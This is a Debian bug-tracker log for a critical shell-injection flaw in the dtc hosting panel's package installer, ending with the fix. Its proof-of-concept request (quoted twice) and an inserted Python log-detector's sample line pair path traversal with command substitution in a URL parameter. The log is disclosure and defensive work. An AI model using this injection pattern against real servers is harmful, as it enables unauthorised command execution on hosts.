Debian Bug report logs - #637630
shell injection in package installer


Package: src:dtc; Maintainer for src:dtc is Thomas Goirand <zigo@debian.org>;

Reported by: Ansgar Burchardt <ansgar@debian.org>

Date: Sat, 13 Aug 2011 09:03:01 UTC

Severity: critical

Tags: fixed-upstream, security, upstream

Found in versions dtc/0.29.17-1+lenny1, dtc/0.32.10-2

Fixed in versions dtc/0.34.1, dtc/0.29.18-1+lenny2

Done: Thomas Goirand <zigo@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 09:03:05 GMT).


Acknowledgement sent to Ansgar Burchardt <ansgar@debian.org>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Thomas Goirand <zigo@debian.org>. (Sat, 13 Aug 2011 09:03:08 GMT).


Message #5 received at submit@bugs.debian.org:

From: Ansgar Burchardt <ansgar@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: shell injection in package installer
Date: Sat, 13 Aug 2011 11:00:01 +0200
Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream

The package installer helpfully allows users to run shell code:

wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'

Ansgar
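Detection logic for the request pattern in this report, added here as an example and not part of the bug report or the dtc package: it parses constructed Apache-style access-log lines, percent-decodes the query string, and flags dtc do_install requests whose pkg parameter is not a single package name or whose dtcpkg_directory parameter contains shell metacharacters. The log format, the sample lines and the allowed package-name pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format), not real dtc
# logs. The first carries the request from the bug report, with the space
# percent-encoded the way wget sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Aug/2011:11:00:01 +0200] "GET /dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch%20/tmp/more-owned)/tmp/foo&subdomain=www HTTP/1.1" 200 512 "-" "Wget/1.12"
10.0.0.7 - - [13/Aug/2011:11:02:10 +0200] "GET /dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=wordpress&addrlink=example.org/package-installer&dtcpkg_directory=/var/www/example/html/blog&subdomain=www HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Aug/2011:11:03:44 +0200] "GET /dtc/?adm_login=asd&adm_pass=asdf&action=list_packages HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"\S+ (?P<target>\S+) [^"]*" \d+')
# Assumed rule: a package name is one path component that does not start
# with '.' (which rules out '..'); anything else is treated as traversal.
SAFE_PKG = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._-]*$')
# Characters that let a value break out of a shell-interpolated command.
SHELL_META = re.compile(r'[$`;|&()<>\\\'"\s]')

def inspect_request(target):
    """Return findings for one request target; non-do_install requests give []."""
    parts = urlsplit(target)
    if not parts.path.startswith('/dtc/'):
        return []
    # parse_qs splits on '&' and then percent-decodes each value, so encoded
    # '%20' or '%26' inside a value is inspected in its decoded form.
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get('action', [''])[0] != 'do_install':
        return []
    findings = []
    if not SAFE_PKG.match(params.get('pkg', [''])[0]):
        findings.append('pkg: path traversal or unexpected characters')
    if SHELL_META.search(params.get('dtcpkg_directory', [''])[0]):
        findings.append('dtcpkg_directory: shell metacharacters')
    return findings

def scan_log(text):
    """Return (client ip, timestamp, findings) for each flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            findings = inspect_request(m.group('target'))
            if findings:
                alerts.append((m.group('ip'), m.group('ts'), findings))
    return alerts
```

Only the first sample line is reported; the legitimate install and the unrelated action pass through untouched.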




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 14:57:03 GMT).


Acknowledgement sent to Thomas Goirand <thomas@goirand.fr>:
Extra info received and forwarded to list. Copy sent to Thomas Goirand <zigo@debian.org>. (Sat, 13 Aug 2011 14:57:03 GMT).


Message #10 received at 637630@bugs.debian.org:

From: Thomas Goirand <thomas@goirand.fr>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 22:56:17 +0800
On 08/13/2011 05:00 PM, Ansgar Burchardt wrote:
> Package: src:dtc
> Version: 0.32.10-2
> Severity: critical
> Tags: security upstream
> 
> The package installer helpfully allows users to run shell code:
> 
> wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'
> 
> Ansgar

I'm surprised to see both #637630 #637632, because they've been fixed a
long time ago (the same file in the git has the necessary input checking).

Thomas




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 15:09:03 GMT).


Message #13 received at 637630@bugs.debian.org:

From: Ansgar Burchardt <ansgar@debian.org>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 17:04:45 +0200
Thomas Goirand <thomas@goirand.fr> writes:
> I'm surprised to see both #637630 #637632, because they've been fixed a
> long time ago (the same file in the git has the necessary input checking).

I did look at the sources currently in unstable, not the Git repository.

Ansgar




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Goirand <zigo@debian.org>:
Bug#637630; Package src:dtc. (Sat, 13 Aug 2011 15:45:03 GMT).


Message #16 received at 637630@bugs.debian.org:

From: Ansgar Burchardt <ansgar@debian.org>
To: 637630@bugs.debian.org, 637632@bugs.debian.org
Subject: Re: Bug#637630: shell injection in package installer
Date: Sat, 13 Aug 2011 17:40:44 +0200
found 637630 0.29.17-1+lenny1
tag 637630 fixed-upstream
found 637632 0.29.17-1+lenny1
tag 637632 fixed-upstream
thanks

Ansgar Burchardt <ansgar@debian.org> writes:
> Thomas Goirand <thomas@goirand.fr> writes:
>> I'm surprised to see both #637630 #637632, because they've been fixed a
>> long time ago (the same file in the git has the necessary input checking).
>
> I did look at the sources currently in unstable, not the Git repository.

Indeed there seems to be a patch in Git for these issues[1].  If they
are known since April, why have they been fixed in neither unstable nor
oldstable?

Ansgar

[1] <http://git.gplhost.com/gitweb/?p=dtc.git;a=commitdiff;h=541d8457a6989a1a925bb866ed972a5f07c2de64>




Bug Marked as found in versions dtc/0.29.17-1+lenny1. Request was from Ansgar Burchardt <ansgar@debian.org> to control@bugs.debian.org. (Sat, 13 Aug 2011 15:45:06 GMT).


Added tag(s) fixed-upstream. Request was from Ansgar Burchardt <ansgar@debian.org> to control@bugs.debian.org. (Sat, 13 Aug 2011 15:45:07 GMT).


Bug Marked as fixed in versions dtc/0.34.1. Request was from Thomas Goirand <thomas@goirand.fr> to control@bugs.debian.org. (Wed, 14 Sep 2011 16:21:10 GMT).


Reply sent to Thomas Goirand <thomas@goirand.fr>:
You have taken responsibility. (Mon, 19 Dec 2011 02:57:12 GMT).


Notification sent to Ansgar Burchardt <ansgar@debian.org>:
Bug acknowledged by developer. (Mon, 19 Dec 2011 02:57:12 GMT).


Message #27 received at 637630-done@bugs.debian.org:

From: Thomas Goirand <thomas@goirand.fr>
To: 637630-done@bugs.debian.org
Subject: Also fixed in Lenny
Date: Mon, 19 Dec 2011 10:55:40 +0800



Reply sent to Thomas Goirand <zigo@debian.org>:
You have taken responsibility. (Mon, 19 Dec 2011 20:06:26 GMT).


Notification sent to Ansgar Burchardt <ansgar@debian.org>:
Bug acknowledged by developer. (Mon, 19 Dec 2011 20:06:26 GMT).


Message #32 received at 637630-close@bugs.debian.org:

From: Thomas Goirand <zigo@debian.org>
To: 637630-close@bugs.debian.org
Subject: Bug#637630: fixed in dtc 0.29.18-1+lenny2
Date: Mon, 19 Dec 2011 20:04:29 +0000
Source: dtc
Source-Version: 0.29.18-1+lenny2

We believe that the bug you reported is fixed in the latest version of
dtc, which is due to be installed in the Debian FTP archive:

dtc-common_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-common_0.29.18-1+lenny2_all.deb
dtc-core_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-core_0.29.18-1+lenny2_all.deb
dtc-cyrus_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-cyrus_0.29.18-1+lenny2_all.deb
dtc-postfix-courier_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-postfix-courier_0.29.18-1+lenny2_all.deb
dtc-stats-daemon_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-stats-daemon_0.29.18-1+lenny2_all.deb
dtc-toaster_0.29.18-1+lenny2_all.deb
  to main/d/dtc/dtc-toaster_0.29.18-1+lenny2_all.deb
dtc_0.29.18-1+lenny2.diff.gz
  to main/d/dtc/dtc_0.29.18-1+lenny2.diff.gz
dtc_0.29.18-1+lenny2.dsc
  to main/d/dtc/dtc_0.29.18-1+lenny2.dsc
dtc_0.29.18.orig.tar.gz
  to main/d/dtc/dtc_0.29.18.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 637630@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated dtc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.8
Date: Sun, 11 Sep 2011 05:15:26 +0000
Source: dtc
Binary: dtc-common dtc-core dtc-cyrus dtc-postfix-courier dtc-stats-daemon dtc-toaster
Architecture: source all
Version: 0.29.18-1+lenny2
Distribution: lenny-security
Urgency: low
Maintainer: Thomas Goirand <zigo@debian.org>
Changed-By: Thomas Goirand <zigo@debian.org>
Description: 
 dtc-common - web control panel for admin and accounting hosting services (comm
 dtc-core   - web control panel for admin and accounting hosting services (fewe
 dtc-cyrus  - web control panel for admin and accounting hosting services (cyru
 dtc-postfix-courier - web control panel for admin and accounting hosting services (more
 dtc-stats-daemon - dtc-xen VM statistics for the dtc web control panel
 dtc-toaster - web control panel for admin and accounting hosting services (meta
Closes: 637469 637477 637485 637487 637537 637584 637618 637629 637630 637632 637669
Changes: 
 dtc (0.29.18-1+lenny2) lenny-security; urgency=low
 .
   * QA upload fixing:
     - Removed old iGlobalWall folder which included unwanted information.
     - Removed sourceless OSX mod_log_sql.so files (Closes: #637469).
     - Fixes lists shell injection issue (Closes: #637477).
     - Sets unix rights to non-world readable for the apache2.conf file,
     since it contains SQL access password (Closes: #637485).
     - Now htmlspecialchars() the output of DNS & MX, preventing a possible
     HTML injection issue (Closes: #637584).
     - Fixes "package installer includes php files in untrusted directories"
     if some package install packages are installed (Closes: #637629, #637630).
     - Adds htmlspecialchars() in the ticket display.
     - Fixes sudo access to chrootuid is giving access to root using the new
     dtc-chroot-wrapper (Closes: #637618).
     - Not using htpasswd -b to create .htpasswd files (Closes: #637537).
     - Checks $_SERVER["addrlink"] input correctly, since it could lead to very
     bad SQL insertion (Closes: #637487 ).
     - Fixes an SQL injection in package installer (Closes: #637632).
     - Fixes an SQL injection in the draw_user_admin.php (Closes: #637669).






Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 17 Jan 2012 07:36:28 GMT).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sun Apr 20 02:33:49 2025; Machine Name: buxtehude
